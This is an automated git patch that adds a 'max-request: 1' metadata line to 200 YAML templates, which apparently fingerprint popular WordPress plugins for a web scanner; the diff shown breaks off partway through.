GitHub Action Date: Wed, 6 Sep 2023 08:29:16 +0000 Subject: [PATCH 0175/1090] TemplateMan Update [Wed Sep 6 08:29:16 UTC 2023] :robot: --- http/technologies/wordpress/plugins/ad-inserter.yaml | 1 + http/technologies/wordpress/plugins/add-to-any.yaml | 1 + http/technologies/wordpress/plugins/admin-menu-editor.yaml | 1 + http/technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 + http/technologies/wordpress/plugins/akismet.yaml | 1 + .../wordpress/plugins/all-404-redirect-to-homepage.yaml | 1 + http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 1 + http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 + .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 1 + http/technologies/wordpress/plugins/amp.yaml | 1 + http/technologies/wordpress/plugins/antispam-bee.yaml | 1 + http/technologies/wordpress/plugins/astra-sites.yaml | 1 + http/technologies/wordpress/plugins/astra-widgets.yaml | 1 + http/technologies/wordpress/plugins/autoptimize.yaml | 1 + http/technologies/wordpress/plugins/backwpup.yaml | 1 + http/technologies/wordpress/plugins/better-search-replace.yaml | 1 + http/technologies/wordpress/plugins/better-wp-security.yaml | 1 + .../wordpress/plugins/black-studio-tinymce-widget.yaml | 1 + http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 1 + http/technologies/wordpress/plugins/breeze.yaml | 1 + http/technologies/wordpress/plugins/broken-link-checker.yaml | 1 + .../technologies/wordpress/plugins/child-theme-configurator.yaml | 1 + http/technologies/wordpress/plugins/classic-editor.yaml | 1 + http/technologies/wordpress/plugins/classic-widgets.yaml | 1 + .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 1 + http/technologies/wordpress/plugins/cmb2.yaml | 1 + http/technologies/wordpress/plugins/coblocks.yaml | 1 + http/technologies/wordpress/plugins/code-snippets.yaml | 1 + http/technologies/wordpress/plugins/coming-soon.yaml | 1 + http/technologies/wordpress/plugins/complianz-gdpr.yaml | 1 + http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 + http/technologies/wordpress/plugins/contact-form-7.yaml | 1 + http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 1 + http/technologies/wordpress/plugins/cookie-law-info.yaml | 1 + http/technologies/wordpress/plugins/cookie-notice.yaml | 1 + http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 1 + .../wordpress/plugins/creative-mail-by-constant-contact.yaml | 1 + http/technologies/wordpress/plugins/custom-css-js.yaml | 1 + http/technologies/wordpress/plugins/custom-fonts.yaml | 1 + http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 1 + http/technologies/wordpress/plugins/disable-comments.yaml | 1 + http/technologies/wordpress/plugins/disable-gutenberg.yaml | 1 + http/technologies/wordpress/plugins/duplicate-page.yaml | 1 + http/technologies/wordpress/plugins/duplicate-post.yaml | 1 + http/technologies/wordpress/plugins/duplicator.yaml | 1 + .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 1 + http/technologies/wordpress/plugins/easy-fancybox.yaml | 1 + http/technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 + http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 1 + http/technologies/wordpress/plugins/elementor.yaml | 1 + http/technologies/wordpress/plugins/elementskit-lite.yaml | 1 + http/technologies/wordpress/plugins/enable-media-replace.yaml | 1 + http/technologies/wordpress/plugins/envato-elements.yaml | 1 + .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 1 + http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 1 + .../technologies/wordpress/plugins/facebook-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/fast-indexing-api.yaml | 1 + .../wordpress/plugins/favicon-by-realfavicongenerator.yaml | 1 + http/technologies/wordpress/plugins/flamingo.yaml | 1 + http/technologies/wordpress/plugins/fluentform.yaml | 1 + http/technologies/wordpress/plugins/font-awesome.yaml | 1 + .../wordpress/plugins/force-regenerate-thumbnails.yaml | 1 + http/technologies/wordpress/plugins/formidable.yaml | 1 + http/technologies/wordpress/plugins/forminator.yaml | 1 + http/technologies/wordpress/plugins/ga-google-analytics.yaml | 1 + http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 + .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 1 + .../wordpress/plugins/google-analytics-for-wordpress.yaml | 1 + http/technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 + http/technologies/wordpress/plugins/google-site-kit.yaml | 1 + .../technologies/wordpress/plugins/google-sitemap-generator.yaml | 1 + http/technologies/wordpress/plugins/gtranslate.yaml | 1 + http/technologies/wordpress/plugins/gutenberg.yaml | 1 + http/technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 + .../wordpress/plugins/header-footer-code-manager.yaml | 1 + http/technologies/wordpress/plugins/header-footer-elementor.yaml | 1 + http/technologies/wordpress/plugins/header-footer.yaml | 1 + http/technologies/wordpress/plugins/health-check.yaml | 1 + http/technologies/wordpress/plugins/hello-dolly.yaml | 1 + http/technologies/wordpress/plugins/host-webfonts-local.yaml | 1 + http/technologies/wordpress/plugins/imagify.yaml | 1 + http/technologies/wordpress/plugins/imsanity.yaml | 1 + .../wordpress/plugins/insert-headers-and-footers.yaml | 1 + http/technologies/wordpress/plugins/instagram-feed.yaml | 1 + .../wordpress/plugins/intuitive-custom-post-order.yaml | 1 + http/technologies/wordpress/plugins/iwp-client.yaml | 1 + http/technologies/wordpress/plugins/jetpack-boost.yaml | 1 + http/technologies/wordpress/plugins/jetpack.yaml | 1 + http/technologies/wordpress/plugins/kadence-blocks.yaml | 1 + http/technologies/wordpress/plugins/kirki.yaml | 1 + http/technologies/wordpress/plugins/leadin.yaml | 1 + .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 1 + http/technologies/wordpress/plugins/limit-login-attempts.yaml | 1 + http/technologies/wordpress/plugins/litespeed-cache.yaml | 1 + http/technologies/wordpress/plugins/loco-translate.yaml | 1 + http/technologies/wordpress/plugins/loginizer.yaml | 1 + http/technologies/wordpress/plugins/loginpress.yaml | 1 + .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 1 + http/technologies/wordpress/plugins/mailpoet.yaml | 1 + http/technologies/wordpress/plugins/maintenance.yaml | 1 + http/technologies/wordpress/plugins/mainwp-child.yaml | 1 + http/technologies/wordpress/plugins/malcare-security.yaml | 1 + http/technologies/wordpress/plugins/megamenu.yaml | 1 + http/technologies/wordpress/plugins/members.yaml | 1 + http/technologies/wordpress/plugins/meta-box.yaml | 1 + http/technologies/wordpress/plugins/ml-slider.yaml | 1 + http/technologies/wordpress/plugins/newsletter.yaml | 1 + .../technologies/wordpress/plugins/nextend-facebook-connect.yaml | 1 + http/technologies/wordpress/plugins/nextgen-gallery.yaml | 1 + http/technologies/wordpress/plugins/ninja-forms.yaml | 1 + http/technologies/wordpress/plugins/ocean-extra.yaml | 1 + http/technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 + http/technologies/wordpress/plugins/one-click-demo-import.yaml | 1 + http/technologies/wordpress/plugins/optinmonster.yaml | 1 + http/technologies/wordpress/plugins/otter-blocks.yaml | 1 + http/technologies/wordpress/plugins/password-protected.yaml | 1 + http/technologies/wordpress/plugins/pdf-embedder.yaml | 1 + .../wordpress/plugins/pinterest-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/pixelyoursite.yaml | 1 + http/technologies/wordpress/plugins/polylang.yaml | 1 + http/technologies/wordpress/plugins/popup-builder.yaml | 1 + http/technologies/wordpress/plugins/popup-maker.yaml | 1 + http/technologies/wordpress/plugins/post-smtp.yaml | 1 + http/technologies/wordpress/plugins/post-types-order.yaml | 1 + .../wordpress/plugins/premium-addons-for-elementor.yaml | 1 + http/technologies/wordpress/plugins/pretty-link.yaml | 1 + http/technologies/wordpress/plugins/really-simple-captcha.yaml | 1 + http/technologies/wordpress/plugins/really-simple-ssl.yaml | 1 + http/technologies/wordpress/plugins/redirection.yaml | 1 + http/technologies/wordpress/plugins/redux-framework.yaml | 1 + http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 1 + http/technologies/wordpress/plugins/safe-svg.yaml | 1 + http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 1 + http/technologies/wordpress/plugins/sg-cachepress.yaml | 1 + http/technologies/wordpress/plugins/sg-security.yaml | 1 + http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 1 + .../wordpress/plugins/shortpixel-image-optimiser.yaml | 1 + .../technologies/wordpress/plugins/simple-custom-post-order.yaml | 1 + http/technologies/wordpress/plugins/siteguard.yaml | 1 + http/technologies/wordpress/plugins/siteorigin-panels.yaml | 1 + http/technologies/wordpress/plugins/smart-slider-3.yaml | 1 + http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 1 + .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 1 + http/technologies/wordpress/plugins/sucuri-scanner.yaml | 1 + http/technologies/wordpress/plugins/svg-support.yaml | 1 + http/technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 + http/technologies/wordpress/plugins/tablepress.yaml | 1 + http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 1 + http/technologies/wordpress/plugins/the-events-calendar.yaml | 1 + http/technologies/wordpress/plugins/themeisle-companion.yaml | 1 + http/technologies/wordpress/plugins/tinymce-advanced.yaml | 1 + .../wordpress/plugins/translatepress-multilingual.yaml | 1 + .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 1 + http/technologies/wordpress/plugins/under-construction-page.yaml | 1 + http/technologies/wordpress/plugins/updraftplus.yaml | 1 + http/technologies/wordpress/plugins/use-any-font.yaml | 1 + http/technologies/wordpress/plugins/user-role-editor.yaml | 1 + .../technologies/wordpress/plugins/velvet-blues-update-urls.yaml | 1 + http/technologies/wordpress/plugins/w3-total-cache.yaml | 1 + .../technologies/wordpress/plugins/webp-converter-for-media.yaml | 1 + http/technologies/wordpress/plugins/webp-express.yaml | 1 + .../technologies/wordpress/plugins/widget-importer-exporter.yaml | 1 + .../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 1 + .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 1 + http/technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 + .../plugins/woocommerce-gateway-paypal-express-checkout.yaml | 1 + .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 1 + http/technologies/wordpress/plugins/woocommerce-payments.yaml | 1 + .../wordpress/plugins/woocommerce-paypal-payments.yaml | 1 + .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 1 + http/technologies/wordpress/plugins/woocommerce-services.yaml | 1 + http/technologies/wordpress/plugins/woocommerce.yaml | 1 + http/technologies/wordpress/plugins/wordfence.yaml | 1 + http/technologies/wordpress/plugins/wordpress-importer.yaml | 1 + http/technologies/wordpress/plugins/wordpress-seo.yaml | 1 + http/technologies/wordpress/plugins/worker.yaml | 1 + http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 1 + http/technologies/wordpress/plugins/wp-file-manager.yaml | 1 + http/technologies/wordpress/plugins/wp-google-maps.yaml | 1 + http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 1 + http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 1 + http/technologies/wordpress/plugins/wp-migrate-db.yaml | 1 + http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 1 + http/technologies/wordpress/plugins/wp-optimize.yaml | 1 + http/technologies/wordpress/plugins/wp-pagenavi.yaml | 1 + http/technologies/wordpress/plugins/wp-reset.yaml | 1 + .../wordpress/plugins/wp-reviews-plugin-for-google.yaml | 1 + http/technologies/wordpress/plugins/wp-rollback.yaml | 1 + http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 1 + http/technologies/wordpress/plugins/wp-smushit.yaml | 1 + http/technologies/wordpress/plugins/wp-statistics.yaml | 1 + http/technologies/wordpress/plugins/wp-super-cache.yaml | 1 + http/technologies/wordpress/plugins/wp-user-avatar.yaml | 1 + http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 1 + http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 1 + http/technologies/wordpress/plugins/wpforms-lite.yaml | 1 + http/technologies/wordpress/plugins/wps-hide-login.yaml | 1 + http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 1 + .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 1 + 200 files changed, 200 insertions(+) diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index 7cbd1855ae..ebb5ba1042 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ad-inserter/ metadata: + max-request: 1 plugin_namespace: ad-inserter wpscan: https://wpscan.com/plugin/ad-inserter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index 8d579ff23d..fddfbf3118 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/add-to-any/ metadata: + max-request: 1 plugin_namespace: add-to-any wpscan: https://wpscan.com/plugin/add-to-any tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index 4a6d8b7bbe..7a6e8a76ec 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/admin-menu-editor/ metadata: + max-request: 1 plugin_namespace: admin-menu-editor wpscan: https://wpscan.com/plugin/admin-menu-editor tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index e4eb308d39..940c0e614c 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/advanced-custom-fields/ metadata: + max-request: 1 plugin_namespace: advanced-custom-fields wpscan: https://wpscan.com/plugin/advanced-custom-fields tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index 97f1d8c18f..06cfd4950b 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/akismet/ metadata: + max-request: 1 plugin_namespace: akismet wpscan: https://wpscan.com/plugin/akismet tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml index 10f104f2c7..90aa5881fd 100644 --- a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml +++ b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/all-404-redirect-to-homepage/ metadata: + max-request: 1 plugin_namespace: all-404-redirect-to-homepage wpscan: https://wpscan.com/plugin/all-404-redirect-to-homepage tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index 8addc28ded..1bf337da6c 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/all-in-one-seo-pack/ metadata: + max-request: 1 plugin_namespace: all-in-one-seo-pack wpscan: https://wpscan.com/plugin/all-in-one-seo-pack tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index 2e579621ac..7cec152555 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/all-in-one-wp-migration/ metadata: + max-request: 1 plugin_namespace: all-in-one-wp-migration wpscan: https://wpscan.com/plugin/all-in-one-wp-migration tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index 41e297ffeb..8a4b6133cd 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/ metadata: + max-request: 1 plugin_namespace: all-in-one-wp-security-and-firewall wpscan: https://wpscan.com/plugin/all-in-one-wp-security-and-firewall tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index 0dd8686ec3..cfa2e3d080 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/amp/ metadata: + max-request: 1 plugin_namespace: amp wpscan: https://wpscan.com/plugin/amp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index 359671f3bd..a92d9bde4e 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/antispam-bee/ metadata: + max-request: 1 plugin_namespace: antispam-bee wpscan: https://wpscan.com/plugin/antispam-bee tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index 116e0c420a..59144c7dd5 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/astra-sites/ metadata: + max-request: 1 plugin_namespace: astra-sites wpscan: https://wpscan.com/plugin/astra-sites tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/astra-widgets.yaml b/http/technologies/wordpress/plugins/astra-widgets.yaml index dc4703ef8d..df06ba2f35 100644 --- a/http/technologies/wordpress/plugins/astra-widgets.yaml +++ b/http/technologies/wordpress/plugins/astra-widgets.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/astra-widgets/ metadata: + max-request: 1 plugin_namespace: astra-widgets wpscan: https://wpscan.com/plugin/astra-widgets tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index 1426ac3ef2..2a79d529cc 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/autoptimize/ metadata: + max-request: 1 plugin_namespace: autoptimize wpscan: https://wpscan.com/plugin/autoptimize tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index 78d1651ff4..556a113acc 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/backwpup/ metadata: + max-request: 1 plugin_namespace: backwpup wpscan: https://wpscan.com/plugin/backwpup tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index f7219b373d..58d9a9d738 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/better-search-replace/ metadata: + max-request: 1 plugin_namespace: better-search-replace wpscan: https://wpscan.com/plugin/better-search-replace tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index f688a68f72..6c9c485079 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/better-wp-security/ metadata: + max-request: 1 plugin_namespace: better-wp-security wpscan: https://wpscan.com/plugin/better-wp-security tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index 00e95c4263..7631e87d78 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/black-studio-tinymce-widget/ metadata: + max-request: 1 plugin_namespace: black-studio-tinymce-widget wpscan: https://wpscan.com/plugin/black-studio-tinymce-widget tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index 212b2b13c4..c7daa26ac6 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/breadcrumb-navxt/ metadata: + max-request: 1 plugin_namespace: breadcrumb-navxt wpscan: https://wpscan.com/plugin/breadcrumb-navxt tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index 6318392c5c..68767e4dce 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/breeze/ metadata: + max-request: 1 plugin_namespace: breeze wpscan: https://wpscan.com/plugin/breeze tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index e1a2a186e0..073618936d 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/broken-link-checker/ metadata: + max-request: 1 plugin_namespace: broken-link-checker wpscan: https://wpscan.com/plugin/broken-link-checker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index 23614882a7..6aabc19e9f 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/child-theme-configurator/ metadata: + max-request: 1 plugin_namespace: child-theme-configurator wpscan: https://wpscan.com/plugin/child-theme-configurator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index 85965337cb..ac80e4f31b 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/classic-editor/ metadata: + max-request: 1 plugin_namespace: classic-editor wpscan: https://wpscan.com/plugin/classic-editor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index 33d903a1b4..15d7a24755 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/classic-widgets/ metadata: + max-request: 1 plugin_namespace: classic-widgets wpscan: https://wpscan.com/plugin/classic-widgets tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index 3c6f8f287b..40ccc15b27 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/click-to-chat-for-whatsapp/ metadata: + max-request: 1 plugin_namespace: click-to-chat-for-whatsapp wpscan: https://wpscan.com/plugin/click-to-chat-for-whatsapp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index c3b630cde2..1fad3cee08 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/cmb2/ metadata: + max-request: 1 plugin_namespace: cmb2 wpscan: https://wpscan.com/plugin/cmb2 tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index 5c8ce709b6..ebe4ee41a7 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/coblocks/ metadata: + max-request: 1 plugin_namespace: coblocks wpscan: https://wpscan.com/plugin/coblocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index aea47b9e84..5c32110e0e 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/code-snippets/ metadata: + max-request: 1 plugin_namespace: code-snippets wpscan: https://wpscan.com/plugin/code-snippets tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index 78c584c388..09c2e2f360 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/coming-soon/ metadata: + max-request: 1 plugin_namespace: coming-soon wpscan: https://wpscan.com/plugin/coming-soon tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index 2c80d09c27..1a2e8beb3e 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/complianz-gdpr/ metadata: + max-request: 1 plugin_namespace: complianz-gdpr wpscan: https://wpscan.com/plugin/complianz-gdpr tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index 4b1b3a8754..706145493c 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/contact-form-7-honeypot/ metadata: + max-request: 1 plugin_namespace: contact-form-7-honeypot wpscan: https://wpscan.com/plugin/contact-form-7-honeypot tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index 06ad83bdf7..cf6a6ee635 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/contact-form-7/ metadata: + max-request: 1 plugin_namespace: contact-form-7 wpscan: https://wpscan.com/plugin/contact-form-7 tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index b20666268f..c039765929 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/contact-form-cfdb7/ metadata: + max-request: 1 plugin_namespace: contact-form-cfdb7 wpscan: https://wpscan.com/plugin/contact-form-cfdb7 tags: tech,wordpress,wp-plugin,top-200 diff --git 